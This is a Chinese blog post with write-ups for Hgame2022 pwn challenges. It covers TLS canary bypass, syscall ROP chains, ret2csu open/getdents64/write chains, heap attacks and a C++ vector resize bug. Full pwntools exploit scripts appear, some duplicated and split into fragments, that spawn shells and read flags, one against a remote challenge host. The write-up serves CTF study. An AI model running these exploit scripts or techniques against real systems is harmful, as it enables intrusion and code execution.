-
-
[原创]Hgame2022
-
发表于: 2022-4-28 00:15 10181
-
(1)线程调试:
(2)TLS(线程局部储存):防止当一个线程卡死后对其它线程对全局变量或该函数内的static变量的使用产生影响,会在该线程开始时,拷贝一份全局变量和static变量到TLS段。线程的TLS段一般和栈段挨得很近
(3)线程题的canary比较:线程题的canary是把栈段的canary和TLS段的副本进行比较,所以要绕过canary的话,可以将栈段和TLS段的canary均覆盖成相同的值
(4)系统调用
(5)aoti函数
atoi (表示 ascii to integer)是把字符串转换成整型数的一个函数,应用在计算机程序和办公软件中。int atoi(const char *nptr) 函数会扫描参数 nptr字符串,会跳过前面的空白字符(例如空格,tab缩进)等。如果 nptr不能转换成 int 或者 nptr为空字符串,那么将返回 0。特别注意,该函数要求被转换的字符串是按十进制数理解的。atoi输入的字符串对应数字存在大小限制(与int类型大小有关),若其过大可能报错-1。
(6)open函数
参数一:表示打开文件的目录
参数二:表示打开文件的方式(0是只读)
功能,打开参数一所指向的文件并向rax寄存器返回fd指针
(7)getdents64函数
参数一:fd指针
参数二:写入的内存区域
参数三:4096
功能:把当前文件目录下的文件名写入参数二指向的内存区域
(8)OGW
是对使用open、getdents64、write函数(或系统调用)将目录中的文件名读入指定区域的简称
(9)ORW
是对使用open、read、
(10)沙箱保护
有些题目可能会用沙箱的prctl函数或者seccomp函数来静止使用一些系统调用
可以用seccomp-tools dump ./file_name看查
(11)泄露进程地址
网上百度了一下才知道pthread_create和pthread_join的作用
所以重点在运行的test_thread函数
发现可供读入的数据很长,所以想到栈溢出,但是函数列表里面没有后门函数,所以考虑泄露libc基址然后执行shell函数
溢出什么呢?先gdb看看栈上吧
发现了一个栈上存了一个栈地址0x7ffff7d9b700,且这个地址和其它地址的偏移是固定的。那么我们就可以泄露这个地址,根据固定偏移,就能得到可执行文件内存中存放的一个ibc库函数的got表地址(这里我选的是在main函数栈中存放的__libc_start_main函数)从而泄露libc基址
然而,如果泄露了libc地址,随意胡乱覆盖就能覆盖到返回地址的话,那你真的是小看了chuj学长
var_4是变量i在栈中的偏移,如果直接覆盖,会对i的值有所影响。后果就是要么i的值大于4095提前结束,要么覆盖到一个很远的位置。
如何解决?
覆盖的时候合理一点,这就需要个人调试,也是一道不错的练io和gdb的题
比第一题多了一个canary
main函数和第一题一样
发现也是多了一个canary
那就要思考如何绕过这个canary了
(1)相较第一题多进行一次thread_test函数泄露canary,然后在最后一次填入泄露的canary绕过然后溢出至shell函数
不行:由于canary的低字节为'\x00',要想用puts函数泄露必须要补上非'\x00'的字符,但这样无法还原canary,会触发保护机制
(2)猜想canary是个伪随机数
离谱:如果真的是,为啥还有那么多小可爱尝试爆破
在网上搜素(2)的过程中,发现了TLS这个东西(也就是开篇的那个知识(2)),于是就有了一个还算正常的思路
覆盖canary和TLS的stack_gurd的值相同,进行绕过然后到达shell
在尝试了构造ROP链调用system函数还有onegadget不行后,询问chuj学长得知,还有最后一条路没有走——系统调用
最后走通了
还是很疑惑前两个为啥走不通
听chuj学长说应该是dtv指针被修改了
main就不看了,也是个线程,直接看线程函数
memcmp不像strcmp,不会触发'\x00'截断机制
还好,write函数也不像puts函数同样不会被截断
所以思路已经很清晰了,先用gdb调调看,看s2所指的字符长啥样然后将buf置为相同
利用write函数打印canary,然后用gets函数直接ret2backdoor
发现cp那段很可以,复制到百度康康,然后得知是head指令后面生成了随机数,于是自己复制了head后面一大截跑了下
发现是一个长度为20的字符串,猜测flag是变成了flag+这长度为20的随机数
那就需要泄露了,一开始没有啥头绪,想到了ls好像有这个功能
就百度了一下ls的实现
于是就学到了系统调用getdents64[挂一下博客] https://blog.csdn.net/cnbird2008/article/details/11629095
发现if比较的时候用到nbytes的类型是int64,而read的一个无符号数
所以可以考虑把nbytes置为一个负数,绕过if的同时保证了read的充足输入
显然read是读不完的(至少都要读2^31个数据)
所以我们需要截断read的读入
由于read函数是读到EOF或者'\n'截止的,所以直接用sendline即可
这样我们就可以ret2ROP了
这道题的ROP我分成三个部分:泄露libc并返回main、OGW、ORW(OGW和ORW我放在”学到的知识“里面了,就不赘述)
由于OGW和ORW中间调用的打开目录是字符串"./“和”flag+20个随机数字符“
熟悉c语言的师傅应该知道,”字符串“本质上是一个地址,open和getdents64函数的目录参数也是地址
所以我们需要用read函数在中间穿插将字符串读入bss段
好家伙,比美国经济大萧条时期的股票还绿
可以看出是标准的spfa求多源最短路,由于曾经是oier,就特别入迷,能看懂但是找不到洞
切换为pwn手,发现dist[v6],v6没有范围限制,结合招新赛浩哥那道secret,就能知道这是一个任意地址读
和做浩哥那道题一样,我们直接看汇编
可以发现,rax就是我们输入的v6*8
已经有了任意地址读,那么我们希望有任意地址写的功能
从function_list也能看出已经有后门函数了
看着这个c艹的反汇编,我还真的看懂了,但其实只要知道dist这个数组,它又可以被修改就好了
修改的值是输入的边权
所以如果想修改dist+v5*8的位置,连一条源节点向这个位置的边,就可以覆盖这个位置的为边权
所以,我们如果想把main_ret的值修改为back_door,就可以这么做
至此,我们做到了伪任意地址读写
为啥是伪,因为开了pie,地址是随机的,所以需要泄露地址
需要泄露libc的和进程的基地址,泄露进程基地址很容易理解
泄露libc是为了用symbols表获得栈地址的相对偏移从而泄露
所以思路很清晰了,用两次任意地址读分别泄露libc、进程的地址
再用一次,泄露stack地址
最后用任意地址写,修改main_ret为back_door
但真的行吗?(指上一句)
gdb里发现会被对齐卡死
这里就要有一个技巧了
我们直接绕过push指令,直接ret2backdoor+5,就能对齐了
(1)/proc/self/mem
(2)tcache bin
(3)glibc 2.31版本的fastbin stash,unsorted bin UAF
(4)字符串格式化漏洞(这个直接写在另一篇博客了)
(5)realloc函数
就是一道盲打题,但是好像没有学到啥........
就练了练IO
好家伙全绿,意思是要leak
很标准的增删秀
怎么打呢?
首先利用unsorted bin进行uaf leak libc,但先需要填满tcache
由于tcache的key检测,我们需要先填满tcache然后在fastbin double free
在fastbin里double free的时候,若tcache此时为空,通过stash机制会自然把fastbin的chunk放入tcache,自然绕过了对size的检测
double free修改__free_hook为system,同时将fake_chunk的前一个add的chunk的content置为'/bin/sh'
那么原来free(pre_chunk_content_address)就变为system('/bin/sh')了
很经典的保护,地址随机化+不能修改got表
从printf函数能够看出存在字符串格式化漏洞
看到了reallo函数就知道可能是需要修改__free_hook来实现shell
如何修改就需要我们的fmt了,这个在博客里写得很清楚就不再赘述了
原理: 利用unsorted bin的头和尾的bk或fd指针指向的是main_arena,而main_arena虽然不在libc.sym中 但是和libc里其它函数的sym表的偏移是固定的,于是可以间接泄露libc基地址 分为两种: (1)free之后堆指针(严格来说是数组里存的每个堆的content段的指针即malloc返回值)不清空: 那敢情好啊,直接show就好了 (2)free之后堆指针清空,那么我们可以尝试合并堆块到unsorted bin,通过调用进行切割,使得数组上存的 堆块是unsorted bin,间接达到uaf
堆定位:在堆合并的时候(记堆块指针为p,包含size和pre_size),需要知道合并的是哪个堆。这种定位主要依靠pre_size(向低地址合并)和size(向高地址合并)来实现。位于低地址的就是p-pre_size,而高地址是p+size
堆合并:再定位后会对定位的堆块和原堆块进行合并操作,合并有个重要环节就是unlink,修改部分如下:
乍一看就是链表的删除嘛 ,但是这其中其实有很大的漏洞,假如我们伪造一个堆块,其BK->fd为我们想修改的内容(如__malloc_hook),而fd放上修改的值(如system),那么其实是可以做到任意已知地址修改的
但是这种利用手段在上古的glibc2.23版本就迎来了安全检查,比较精髓的就是会检查BK和FD是否合法(大致如下):
然而还是有其它手段可以利用,这个利用直到2.31都没修改,具体在(4)中可以看到
size严格检查:没看源码,看别的师傅的博客学到的。如果是低地址合并的话,会检查合并的chunk的size段和准备free的chunk的pre_size段是否相同,以及pre_insure是否为0
我们知道,edit函数是直接修改数组上存的指针指向的地址,如果我们可以修改数组上存的指针,那么就能够直接通过edit修改自己想修改的地址。具体是通过unlnk把数组上存上数组的地址(一般是数组首地址,chunk的index一般是3)。此时调用edit(3)即可修改数组上的指针
unlink利用的实现:
在数组上指针为p的chunk里构造fake_chunk,fake_chunk->fd=p-0x18,fake_chunk->bk=p-0x10,并且修改高地址的chunk的pre_size和size能够通过检查。那么绕过在unlink的检查的同时,FD->bk=p=p-0x18(这就是为啥选index3使得为首地址)
通过unlink等手段修改free函数的got表为put函数的plt,数组指针ptr上存任意函数的got表,那么free(ptr)就相当于put(got),即可泄露libc
有的题的读入是read+atoi,如果我们能够修改atoi的got表为system,read的是‘/bin/sh\x00’,那么就可以调用后门
有些时候one_gadget会集体失效,这就需要我们修改栈帧实现它对[rsp+]==NULL的匹配,使用realloc函数是个不错的选择,因为开头有大量的push,并且有一个call rax的操作(这个rax是realloc hook,realloc hook和malloc hook离得非常近),那么我们就可以修改malloc hook为realloc,并且沿途修改realloc hook为one_gadget
如果*chunk=malloc(0x68),那么我们实际可以写入的大小是0x68,因为可以利用下一个chunk的pre_size段
这篇博客(12条消息) off by null 小结_ch3nwr1d的博客-CSDN博客写得挺好的,例题也是一个经典的模板题。
2.23
发现没有show函数,结合保护的partial relro,就可以选择使用unlink修改free函数的got来调用put函数泄露libc。同时读入是read+atoi,那么同样可以在数组所在地址上修改atoi的got为system,read进'/bin/sh\x00'即可get_shell
这题有个小坑就是edit的content的读入是用gets函数实现的,gets函数有个特性,就是会在读入的字符末尾补一个'\x00',我们修改freegot的时候,如果直接发p64()的话,会覆盖后面函数的地址(实测函数是puts函数),导致报错。可以通过发小端字或者p64()[:-1]解决
2.23
发现有一个show函数,且free不会把指针置为NULL,那么就可以通过unsorted bin uaf 泄露libc
知道了libc以后就是经典的fastbin double free了,修改malloc hook 为onegadget,但4个都不行,那么就用realloc抬栈
2.27
发现free以后会修改指针,没办法使用常规的double free和uaf
跟进edit和add:
发现有个off_by_null
那么思路就很清晰了,通过off_by_null实现chunk合并进入unsorted bin ,然后调用切割使得unsorted chunk的地址为数组上存的地址,再show()即可泄露libc了
泄露libc之后,我一开始想的是常规double free即
但是不行的,因为free以后指针会清空,第二次delet(0)就相当于free(0)了
我们发现,当tache无free时,unsorted bin存在free的堆块,那么下次申请就会从unsorted bin 里切割一块下来,且是unsorted chunk的首地址,而我们已经做到首地址在数组里了,再申请一次,并free,就会把这块chunk放入tcache里面,而我们可以通过edit数组上保留的它的地址修改其fd指针为_free_hook。 此后再申请两次即可修改 __free_hook了
我们发现edit里面有两个连续的发送,中间不能通过recv隔开。然而向read函数sendline是个大忌,会出现各种各样的问题,但是两个send会连续发送。我的解决方法是利用time模块下的sleep函数,实现延迟发送:
双重否定表肯定的文学大师ida
曾经用c++搞oi的时候,遇到过一些鬼火代码:
当时就在想:
不过现在转pwn了,会遇到不少c艹的题,而且以后搞Windows和浏览器都有用所以就学了一下:
std:: 是个名称空间标示符,C++标准库中的函数或者对象都是在命名空间std中定义的,所以我们要使用标准函数库中的函数或对象都要使用std来限定。
这样做的原因:
是因为像cout这样的对象在实际操作中或许会有好几个,比如说你自己也可能会不小心定义了一个对象叫cout,那么这两个cout对象就会产生冲突。
为啥俺之前没写过捏,因为只需要这样:
这些已经刻进DNA的写法过了快4年俺才知道背后的原因,所以说要知其所以然
c++常被称为面向对象编程,就是因为它的一个核心功能——类,通过类可以封装一些标准库之外的功能比如自定义的函数和重载运算符。有点像python的module(貌似只有public才类似,privite和protect不太一样),大致用法如下:
这个网站写的很详细,就不赘述了,给上面的代码加个重载加法的功能:
vector在中文里是向量的意思,它也符合向量从起点向一个方向无限延长的性质
相较于数组需要规定大小,vector可以在push_back或者resize的时候,当超过容器容量上限的时,内部自动分配新的内存和内存空间并同时释放原空间,这样可以十分合理地处理未知输入量的问题
释放和分配好像用的是STL的allocator,源码没怎么仔细看。size()、end()、begin()、capability()的实现主要依赖三个迭代器(指针),随便搜搜就能搜到,蓝勾不想写
谈谈做题的经验,对于下面这个vector:
gdb里通过符号表访问notes指向的空间,存的是三个迭代器的值,再访问notes即可看查容器里存的值
主要的难点在operator,回顾前面写的重载加法,有一个发现,如果将operator换成‘+’号前面一个变量,“(参数)”换成第二个变量就完全说得通了。同样,把operator换成第一个变量(通常是后面的括号里从左到右的第一个参数),那么再代入就很好理解了。
习惯了
主要看看move_note,其它都和原来的堆题差不大多,delete保证了不能使用uaf
核心部分大概自己写的话是这个样子的:
漏洞是在notes.resize()和下面的指针修改
notes.resize()会造成vector扩容,并把原来的数据复制到一个新的内存地址,但是*i还是原来的内存上的堆块地址,那么我们就可以故意选择一个比较大的index,引起扩容,从而使得新的内存地址上有两个相同的堆块.
有两个相同的堆块,那么我们就可以触发unsorted bin uaf泄露libc地址,然后fastbin bin double free 和fastbin stash进tcache修改free_hook触发后门函数
摸了一上午,下午有个团建就溜了,老打比赛不认真了
(1)大堆块使用vmmap分配内存,可以gdb里跟进查看地址
2.31 9_2 (和ubnutu20.4的版本不一样。。)
用ghidra可以发现存堆块的指针使用mmap函数申请的,可以用gdb下断点查看
没有限制堆块的申请大小,并且没有初始化指针,可以leak libc和heap
没有对idx为负数的检测,会造成整型溢出
由于note(存堆块指针的数组)是用mmap映射的,heap过大也会用mmap映射,那么可以申请一块较大的堆块使得它与note相邻。利用整型溢出就可以double free,然后fastbin stash就可修改free_hook为system get_shell
i threads :看查当前的线程信息(包括了TLS结构体的位置)
thread n:切换为编号为n的线程
gdb 中使用 `fsbase` 指令即可获得 fs 寄存器的值
i threads :看查当前的线程信息(包括了TLS结构体的位置)
thread n:切换为编号为n的线程
gdb 中使用 `fsbase` 指令即可获得 fs 寄存器的值
32
位系统调用(shell):
eax:设置为系统调用号(
0xb
)
ebx:设置为第一个参数(
/
bin
/
sh字符串地址)
ecx:设置为第二个参数(
0
)
edx:设置为第三个参数(
0
)
64
位系统调用(shell):
rax:(
0x3b
)
rdi:(
/
bin
/
sh)
rsi:(
0
)
rdx:(
0
)
32
位系统调用(shell):
eax:设置为系统调用号(
0xb
)
ebx:设置为第一个参数(
/
bin
/
sh字符串地址)
ecx:设置为第二个参数(
0
)
edx:设置为第三个参数(
0
)
64
位系统调用(shell):
rax:(
0x3b
)
rdi:(
/
bin
/
sh)
rsi:(
0
)
rdx:(
0
)
search
-
t dword 查看残留的进程地址 由于是dword,所以会有错位,所以需要自己补齐
search
-
t dword 查看残留的进程地址 由于是dword,所以会有错位,所以需要自己补齐
pthread_create:创造一个线程来运行第三个参数所指的函数
pthread_join:以阻塞的方式等待thread指定的线程结束。 当函数返回时,被等待线程的资源被收回。 如果线程已经结束,那么该函数会立即返回。
pthread_create:创造一个线程来运行第三个参数所指的函数
pthread_join:以阻塞的方式等待thread指定的线程结束。 当函数返回时,被等待线程的资源被收回。 如果线程已经结束,那么该函数会立即返回。
from
pwn
import
*
r
=
process(
'./a'
)
elf
=
ELF(
'./a'
)
##libpthread=ELF('./libpthread-2.31.so')
libc
=
ELF(
'./libc-2.31.so'
)
context.log_level
=
'debug'
#gdb.attach(r)
pop_rdi_ret
=
0x401313
payload
=
'a'
*
32
+
'\x0a'
r.send(payload)
address
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(
hex
(address))
libcbase
=
address
-
0xa
+
0x2a9b3
-
(libc.symbols[
'__libc_start_main'
]
+
243
)
print
(
hex
(libcbase))
sys_address
=
libcbase
+
libc.symbols[
'system'
]
bin_sh
=
libcbase
+
libc.search(
'/bin/sh'
).
next
()
payload
=
'\x2c'
*
(
0x25
+
8
)
+
'\x00'
*
3
+
'a'
*
8
ROP
=
p64(
0x40101a
)
+
p64(pop_rdi_ret)
+
p64(bin_sh)
+
p64(sys_address)
payload
+
=
ROP
+
'\x0a'
##gdb.attach(r)
r.send(payload)
r.interactive()
from
pwn
import
*
r
=
process(
'./a'
)
elf
=
ELF(
'./a'
)
##libpthread=ELF('./libpthread-2.31.so')
libc
=
ELF(
'./libc-2.31.so'
)
context.log_level
=
'debug'
#gdb.attach(r)
pop_rdi_ret
=
0x401313
payload
=
'a'
*
32
+
'\x0a'
r.send(payload)
address
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(
hex
(address))
libcbase
=
address
-
0xa
+
0x2a9b3
-
(libc.symbols[
'__libc_start_main'
]
+
243
)
print
(
hex
(libcbase))
sys_address
=
libcbase
+
libc.symbols[
'system'
]
bin_sh
=
libcbase
+
libc.search(
'/bin/sh'
).
next
()
payload
=
'\x2c'
*
(
0x25
+
8
)
+
'\x00'
*
3
+
'a'
*
8
ROP
=
p64(
0x40101a
)
+
p64(pop_rdi_ret)
+
p64(bin_sh)
+
p64(sys_address)
payload
+
=
ROP
+
'\x0a'
##gdb.attach(r)
r.send(payload)
r.interactive()
from
pwn
import
*
r
=
process(
'./c'
)
elf
=
ELF(
'./c'
)
##libpthread=ELF('./libpthread-2.31.so')
libc
=
ELF(
'./libc-2.31.so'
)
context.log_level
=
'debug'
##gdb.attach(r)
pop_rdi_ret
=
0x401363
payload
=
'a'
*
32
+
'\x0a'
r.send(payload)
address
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(
hex
(address))
libcbase
=
address
-
0xa
+
0x2a9b3
-
(libc.symbols[
'__libc_start_main'
]
+
243
)
print
(
hex
(libcbase))
##sys_address=libcbase+libc.symbols['system']
bin_sh
=
libcbase
+
libc.search(
'/bin/sh'
).
next
()
##one_gadget=libcbase+0xe6c84
padbt
=
libcbase
+
0x162865
##pop_rax_rdx_rbx_ret
pst
=
libcbase
+
0x27529
##pop_rsi_ret
pdt
=
libcbase
+
0x26b72
##pop_rdi_ret
syscall
=
libcbase
+
0x2584d
payload
=
'a'
*
40
+
'a'
*
8
+
p64(address
-
0xa
-
0x810
)
ROP
=
p64(padbt)
+
p64(
0x3b
)
+
p64(
0
)
+
p64(
0
)
+
p64(pst)
+
p64(
0
)
+
p64(pdt)
+
p64(bin_sh)
+
p64(syscall)
payload
+
=
ROP
+
(
0x838
-
8
*
9
-
48
)
*
'\x61'
+
p64(address
-
0xa
)
+
p64(
0
)
+
p64(address
-
0xa
)
+
p64(
1
)
+
p64(
0
)
+
'a'
*
8
+
'\x0a'
gdb.attach(r)
r.send(payload)
r.interactive()
0x0000000000162865
: pop rax ; pop rdx ; pop rbx ; ret
0x0000000000027529
: pop rsi ; ret
0x0000000000026b72
: pop rdi ; ret
0x000000000002584d
: syscall
from
pwn
import
*
r
=
process(
'./c'
)
elf
=
ELF(
'./c'
)
##libpthread=ELF('./libpthread-2.31.so')
libc
=
ELF(
'./libc-2.31.so'
)
context.log_level
=
'debug'
##gdb.attach(r)
pop_rdi_ret
=
0x401363
payload
=
'a'
*
32
+
'\x0a'
r.send(payload)
address
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(
hex
(address))
libcbase
=
address
-
0xa
+
0x2a9b3
-
(libc.symbols[
'__libc_start_main'
]
+
243
)
print
(
hex
(libcbase))
##sys_address=libcbase+libc.symbols['system']
bin_sh
=
libcbase
+
libc.search(
'/bin/sh'
).
next
()
##one_gadget=libcbase+0xe6c84
padbt
=
libcbase
+
0x162865
##pop_rax_rdx_rbx_ret
pst
=
libcbase
+
0x27529
##pop_rsi_ret
pdt
=
libcbase
+
0x26b72
##pop_rdi_ret
syscall
=
libcbase
+
0x2584d
payload
=
'a'
*
40
+
'a'
*
8
+
p64(address
-
0xa
-
0x810
)
ROP
=
p64(padbt)
+
p64(
0x3b
)
+
p64(
0
)
+
p64(
0
)
+
p64(pst)
+
p64(
0
)
+
p64(pdt)
+
p64(bin_sh)
+
p64(syscall)
payload
+
=
ROP
+
(
0x838
-
8
*
9
-
48
)
*
'\x61'
+
p64(address
-
0xa
)
+
p64(
0
)
+
p64(address
-
0xa
)
+
p64(
1
)
+
p64(
0
)
+
'a'
*
8
+
'\x0a'
gdb.attach(r)
r.send(payload)
r.interactive()
0x0000000000162865
: pop rax ; pop rdx ; pop rbx ; ret
0x0000000000027529
: pop rsi ; ret
0x0000000000026b72
: pop rdi ; ret
0x000000000002584d
: syscall
from
pwn
import
*
r
=
process(
'./b'
)
context.log_level
=
'debug'
r.recvuntil(
"enter your pass word"
)
gdb.attach(r)
payload
=
p64(
0xb0361e0e8294f147
)
+
p64(
0x8c09e0c34ed8a6a9
)
r.send(payload)
r.recvuntil(
'\x7f\x00\x00'
)
canary
=
u64(r.recv(
8
))
print
(
hex
(canary))
payload
=
'a'
*
(
0x20
-
0x8
)
+
p64(canary)
+
p64(
0
)
+
p64(
0x401256
)
r.sendline(payload)
r.interactive()
from
pwn
import
*
r
=
process(
'./b'
)
context.log_level
=
'debug'
r.recvuntil(
"enter your pass word"
)
gdb.attach(r)
payload
=
p64(
0xb0361e0e8294f147
)
+
p64(
0x8c09e0c34ed8a6a9
)
r.send(payload)
r.recvuntil(
'\x7f\x00\x00'
)
canary
=
u64(r.recv(
8
))
print
(
hex
(canary))
payload
=
'a'
*
(
0x20
-
0x8
)
+
p64(canary)
+
p64(
0
)
+
p64(
0x401256
)
r.sendline(payload)
r.interactive()
from
pwn
import
*
context.log_level
=
'debug'
r
=
process(
'./vuln'
)
elf
=
ELF(
'./vuln'
)
libc
=
ELF(
'./libc-2.31.so'
)
wgot
=
elf.got[
'write'
]
rgot
=
elf.got[
'read'
]
bs
=
elf.bss()
csu_f
=
0x401420
csu_b
=
0x401436
pdt
=
0x401443
##pop_rdi_ret
def
csu(a1,a2,a3,f_a):
pd
=
p64(csu_b)
+
p64(
0
)
+
p64(
0
)
+
p64(
1
)
+
p64(a1)
+
p64(a2)
+
p64(a3)
+
p64(f_a)
pd
+
=
p64(csu_f)
pd
+
=
'a'
*
8
*
7
return
pd
##leaklibc&&ret2main
r.recvuntil(
"size?\n"
)
r.send(
'-32'
)
r.recvuntil(
"content?\n"
)
padding
=
0x38
*
'a'
csu_leak_libc
=
padding
+
csu(
1
,wgot,
8
,wgot)
+
p64(
0x401311
)
##csu_read_bss
gdb.attach(r)
r.send(csu_leak_libc)
wars
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(wars)
libcbase
=
wars
-
libc.symbols[
'write'
]
##gadget
pat
=
libcbase
+
0x4a550
##pop_rax_ret
pst
=
libcbase
+
0x27529
##pop_rsi_ret
pd12t
=
libcbase
+
0x11c371
##pop_rdx_r12_ret
syscall
=
libcbase
+
0x66229
def
sys(p,a1,a2,a3):
pd
=
p64(pat)
+
p64(p)
+
p64(pdt)
+
p64(a1)
+
p64(pst)
+
p64(a2)
+
p64(pd12t)
+
p64(a3)
+
p64(
0
)
+
p64(syscall)
return
pd
##OGW&&ORW
r.recvuntil(
"size?\n"
)
pd
=
'-32'
+
'\n'
r.send(pd)
ROP
=
csu(
0
,bs
+
0x30
,
4
,rgot)
+
sys(
2
,bs
+
0x30
,
0
,
0
)
+
sys(
217
,
3
,bs
+
0x100
,
4096
)
+
csu(
1
,bs
+
0x100
,
200
,wgot)
+
csu(
0
,bs
+
0x30
,
0x30
,rgot)
+
sys(
2
,bs
+
0x30
,
0
,
0
)
+
csu(
3
,bs
+
0x200
,
0x60
,rgot)
+
csu(
1
,bs
+
0x200
,
0x60
,wgot)
pd
=
padding
+
ROP
+
p64(
0xdeadbeef
)
+
'\n'
r.recvuntil(
"content?\n"
)
r.send(pd)
pd
=
'./'
r.recvuntil(
"done!\n"
)
r.send(pd)
r.recvuntil(
'flag'
)
string
=
r.recv(
20
)
string
=
'flag'
+
string
r.send(string)
r.interactive()
from
pwn
import
*
context.log_level
=
'debug'
r
=
process(
'./vuln'
)
elf
=
ELF(
'./vuln'
)
libc
=
ELF(
'./libc-2.31.so'
)
wgot
=
elf.got[
'write'
]
rgot
=
elf.got[
'read'
]
bs
=
elf.bss()
csu_f
=
0x401420
csu_b
=
0x401436
pdt
=
0x401443
##pop_rdi_ret
def
csu(a1,a2,a3,f_a):
pd
=
p64(csu_b)
+
p64(
0
)
+
p64(
0
)
+
p64(
1
)
+
p64(a1)
+
p64(a2)
+
p64(a3)
+
p64(f_a)
pd
+
=
p64(csu_f)
pd
+
=
'a'
*
8
*
7
return
pd
##leaklibc&&ret2main
r.recvuntil(
"size?\n"
)
r.send(
'-32'
)
r.recvuntil(
"content?\n"
)
padding
=
0x38
*
'a'
csu_leak_libc
=
padding
+
csu(
1
,wgot,
8
,wgot)
+
p64(
0x401311
)
##csu_read_bss
gdb.attach(r)
r.send(csu_leak_libc)
wars
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
print
(wars)
libcbase
=
wars
-
libc.symbols[
'write'
]
##gadget
pat
=
libcbase
+
0x4a550
##pop_rax_ret
pst
=
libcbase
+
0x27529
##pop_rsi_ret
pd12t
=
libcbase
+
0x11c371
##pop_rdx_r12_ret
syscall
=
libcbase
+
0x66229
def
sys(p,a1,a2,a3):
pd
=
p64(pat)
+
p64(p)
+
p64(pdt)
+
p64(a1)
+
p64(pst)
+
p64(a2)
+
p64(pd12t)
+
p64(a3)
+
p64(
0
)
+
p64(syscall)
return
pd
##OGW&&ORW
r.recvuntil(
"size?\n"
)
pd
=
'-32'
+
'\n'
r.send(pd)
ROP
=
csu(
0
,bs
+
0x30
,
4
,rgot)
+
sys(
2
,bs
+
0x30
,
0
,
0
)
+
sys(
217
,
3
,bs
+
0x100
,
4096
)
+
csu(
1
,bs
+
0x100
,
200
,wgot)
+
csu(
0
,bs
+
0x30
,
0x30
,rgot)
+
sys(
2
,bs
+
0x30
,
0
,
0
)
+
csu(
3
,bs
+
0x200
,
0x60
,rgot)
+
csu(
1
,bs
+
0x200
,
0x60
,wgot)
pd
=
padding
+
ROP
+
p64(
0xdeadbeef
)
+
'\n'
r.recvuntil(
"content?\n"
)
r.send(pd)
pd
=
'./'
r.recvuntil(
"done!\n"
)
r.send(pd)
r.recvuntil(
'flag'
)
string
=
r.recv(
20
)
string
=
'flag'
+
string
r.send(string)
r.interactive()
from
pwn
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
##sh.recvuntil("XXXX+")
##suffix = sh.recvuntil(')').decode("utf8")[:-1]
##log.success(suffix)
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
45574
)
proof_of_work(r)
##r=process('./spfa')
elf
=
ELF(
'./spfa'
)
libc
=
ELF(
'./libc-2.31.so'
)
sla
=
lambda
a,b : r.sendlineafter(a,b)
sla(
"how many datas?\n>> "
,
str
(
4
))
##leak_libc
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
sla(
"to ?\n>> "
,
str
(
-
((elf.sym[
'dist'
]
-
elf.got[
'puts'
])
/
8
)))
##sla("to ?\n>> ",str((elf.got['puts']-elf.sym['dist']/8)))
##libc_base=int(r.recvuntil("\n",drop=True),base=10)-libc.sym['puts']
r.recvuntil(
"path is "
)
libc_base
=
int
(r.recvuntil(
"\n"
, drop
=
True
), base
=
10
)
-
libc.sym[
"puts"
]
##log.success('libc_base:'+hex(libc_base))
##leak_proc
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
sla(
"to ?\n>> "
,
str
((
0x6d28
-
elf.sym[
'dist'
])
/
8
))
r.recvuntil(
"path is "
)
proc_base
=
int
(r.recvuntil(
"\n"
,drop
=
True
),base
=
10
)
-
0x12e0
##log.success('proc_base:'+hex(proc_base))
##leak_stack
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
##gdb.attach(r)
sla(
"to ?\n>> "
,
str
((libc_base
+
libc.sym[
'environ'
]
-
(elf.sym[
'dist'
]
+
proc_base))
/
8
))
r.recvuntil(
"path is "
)
stack_address
=
int
(r.recvuntil(
"\n"
,drop
=
True
),base
=
10
)
##log.success('stack_address:'+hex(stack_address))
ret_address
=
str
((stack_address
-
0x100
-
(proc_base
+
elf.sym[
'dist'
]))
/
8
)
sla(
"nodes?\n>> "
,
str
(
2
))
sla(
"edges?\n>> "
,
str
(
1
))
sla(
"format\n"
,
"0 "
+
ret_address
+
" "
+
str
(proc_base
+
0x16aa
))
sla(
"node?\n>> "
,
str
(
0
))
##gdb.attach(r)
sla(
"to ?\n>> "
,
str
(
0
))
r.interactive()
from
pwn
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
##sh.recvuntil("XXXX+")
##suffix = sh.recvuntil(')').decode("utf8")[:-1]
##log.success(suffix)
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
45574
)
proof_of_work(r)
##r=process('./spfa')
elf
=
ELF(
'./spfa'
)
libc
=
ELF(
'./libc-2.31.so'
)
sla
=
lambda
a,b : r.sendlineafter(a,b)
sla(
"how many datas?\n>> "
,
str
(
4
))
##leak_libc
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
sla(
"to ?\n>> "
,
str
(
-
((elf.sym[
'dist'
]
-
elf.got[
'puts'
])
/
8
)))
